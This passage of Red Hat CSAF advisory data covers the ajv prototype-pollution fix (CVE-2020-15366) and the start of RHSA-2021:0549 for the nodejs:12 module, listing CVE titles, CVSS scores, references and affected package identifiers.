"7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-15366" }, { "category": "external", "summary": "RHBZ#1857977", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1857977" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-15366", "url": "https://www.cve.org/CVERecord?id=CVE-2020-15366" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-15366", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15366" }, { "category": "external", "summary": "https://snyk.io/vuln/SNYK-JS-AJV-584908", "url": "https://snyk.io/vuln/SNYK-JS-AJV-584908" } ], "release_date": "2020-07-04T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-15T18:28:29+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0521" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-ajv: prototype pollution via crafted JSON schema in ajv.validate function" } ] }
rhsa-2021_0549
Vulnerability from csaf_redhat
Published
2021-02-16 14:25
Modified
2024-11-15 09:38
Summary
Red Hat Security Advisory: nodejs:12 security update
Notes
Topic
An update for the nodejs:12 module is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language.
The following packages have been upgraded to a later upstream version: nodejs (12.20.1), nodejs-nodemon (2.0.3).
Security Fix(es):
* nodejs-mixin-deep: prototype pollution in function mixin-deep (CVE-2019-10746)
* nodejs-set-value: prototype pollution in function set-value (CVE-2019-10747)
* nodejs-npm-user-validate: improper input validation when validating user emails leads to ReDoS (CVE-2020-7754)
* nodejs-ini: prototype pollution via malicious INI file (CVE-2020-7788)
* nodejs: use-after-free in the TLS implementation (CVE-2020-8265)
* nodejs: HTTP request smuggling via two copies of a header field in an http request (CVE-2020-8287)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Moderate" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "An update for the nodejs:12 module is now available for Red Hat Enterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. \n\nThe following packages have been upgraded to a later upstream version: nodejs (12.20.1), nodejs-nodemon (2.0.3).\n\nSecurity Fix(es):\n\n* nodejs-mixin-deep: prototype pollution in function mixin-deep (CVE-2019-10746)\n\n* nodejs-set-value: prototype pollution in function set-value (CVE-2019-10747)\n\n* nodejs-npm-user-validate: improper input validation when validating user emails leads to ReDoS (CVE-2020-7754)\n\n* nodejs-ini: prototype pollution via malicious INI file (CVE-2020-7788)\n\n* nodejs: use-after-free in the TLS implementation (CVE-2020-8265)\n\n* nodejs: HTTP request smuggling via two copies of a header field in an http request (CVE-2020-8287)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2021:0549", "url": "https://access.redhat.com/errata/RHSA-2021:0549" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#moderate", "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "category": "external", "summary": "1795475", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1795475" }, { "category": "external", "summary": "1795479", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1795479" }, { "category": "external", "summary": "1892430", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1892430" }, { "category": "external", "summary": "1907444", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1907444" }, { "category": "external", "summary": "1912854", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1912854" }, { "category": "external", "summary": "1912863", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1912863" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_0549.json" } ], "title": "Red Hat Security Advisory: nodejs:12 security update", "tracking": { "current_release_date": "2024-11-15T09:38:59+00:00", "generator": { "date": "2024-11-15T09:38:59+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.1" } }, "id": "RHSA-2021:0549", "initial_release_date": "2021-02-16T14:25:52+00:00", "revision_history": [ { "date": "2021-02-16T14:25:52+00:00", "number": "1", "summary": "Initial version" }, { "date": "2021-02-16T14:25:52+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-11-15T09:38:59+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat Enterprise Linux AppStream (v. 8)", "product": { "name": "Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN", "product_identification_helper": { "cpe": "cpe:/a:redhat:enterprise_linux:8::appstream" } } } ], "category": "product_family", "name": "Red Hat Enterprise Linux" }, { "branches": [ { "category": "product_version", "name": "nodejs:12:8030020210129141730:229f0a1c", "product": { "name": "nodejs:12:8030020210129141730:229f0a1c", "product_id": "nodejs:12:8030020210129141730:229f0a1c", "product_identification_helper": { "purl": "pkg:rpmmod/redhat/nodejs@12:8030020210129141730:229f0a1c" } } }, { "category": "product_version", "name": "nodejs-docs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.noarch", "product": { "name": "nodejs-docs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.noarch", "product_id": "nodejs-docs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-docs@12.20.1-1.module%2Bel8.3.0%2B9503%2B19cb079c?arch=noarch\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.noarch", "product": { "name": "nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.noarch", "product_id": "nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-nodemon@2.0.3-1.module%2Bel8.3.0%2B9715%2B1718613f?arch=noarch" } } }, { "category": "product_version", "name": "nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.noarch", "product": { "name": "nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.noarch", "product_id": "nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-packaging@17-3.module%2Bel8.1.0%2B3369%2B37ae6a45?arch=noarch" } } } ], "category": "architecture", "name": "noarch" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "product": { "name": "nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "product_id": "nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@12.20.1-1.module%2Bel8.3.0%2B9503%2B19cb079c?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "product": { "name": "nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "product_id": "nodejs-debuginfo-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debuginfo@12.20.1-1.module%2Bel8.3.0%2B9503%2B19cb079c?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "product": { "name": "nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "product_id": "nodejs-debugsource-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debugsource@12.20.1-1.module%2Bel8.3.0%2B9503%2B19cb079c?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "product": { "name": "nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "product_id": "nodejs-devel-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-devel@12.20.1-1.module%2Bel8.3.0%2B9503%2B19cb079c?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "product": { "name": "nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "product_id": "nodejs-full-i18n-1:12.20.1-1.module+el8.3.0+9503+19cb079c.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-full-i18n@12.20.1-1.module%2Bel8.3.0%2B9503%2B19cb079c?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.aarch64", "product": { "name": "npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.aarch64", "product_id": "npm-1:6.14.10-1.12.20.1.1.module+el8.3.0+9503+19cb079c.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/npm@6.14.10-1.12.20.1.1.module%2Bel8.3.0%2B9503%2B19cb079c?arch=aarch64\u0026epoch=1" } } } ], "category": "architecture", "name": "aarch64" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.src", "product": { "name": "nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.src", "product_id": "nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@12.20.1-1.module%2Bel8.3.0%2B9503%2B19cb079c?arch=src\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.src", "product": { "name": "nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.src", "product_id": "nodejs-nodemon-0:2.0.3-1.module+el8.3.0+9715+1718613f.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-nodemon@2.0.3-1.module%2Bel8.3.0%2B9715%2B1718613f?arch=src" } } }, { "category": "product_version", "name": "nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.src", "product": { "name": "nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.src", "product_id": "nodejs-packaging-0:17-3.module+el8.1.0+3369+37ae6a45.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-packaging@17-3.module%2Bel8.1.0%2B3369%2B37ae6a45?arch=src" } } } ], "category": "architecture", "name": "src" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:12.20.1-1.module+el8.3.0+9503+19cb079c.ppc64le", "product": { "name": 